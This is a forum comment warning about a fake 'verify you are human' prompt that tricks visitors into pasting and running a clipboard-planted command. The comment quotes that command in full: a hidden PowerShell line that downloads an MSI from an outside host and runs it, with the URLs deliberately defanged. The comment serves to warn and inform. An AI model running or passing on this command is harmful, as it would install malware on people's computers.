|
|
|
|
|
|
by RobIII
481 days ago
|
|
|
Interesting bit starts around 0:32 (ain't nobody got time for this, right?) This shows how malware pops up a dialog to "verify you are human"; something we've all seen in various different permutations. Sometimes we need to click all stoplights, sometimes we need to do a simple math problem or decipher hard to read text. This time you're being asked to enter a key combination (Win+R, then CTRL+V then Enter) which will paste a command that downloads and installs malware. The command has been sneakily put on the clipboard just earlier by the website. The command (DON'T RUN THIS) is as follows: cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\3aw.msi'; Invoke-RestMethod -Uri 'https:\\qq51f.short.gy/1' -OutFile $path; Start-Process $path; This downloads malware from https:\\qq51f.short.gy/1 which redirects to https:\\bestiamos.com/91.brr which is then saved as c:\users\public\3aw.msi and run. (Url's are made invalid by replacing // with \\ deliberately) First mention I could find was feb. 18th: https://any.run/report/e9af23d9fde13156ade19368fd8c2766fe8f1... Maybe this is as old as Rome, but for me it's a first. |
|
|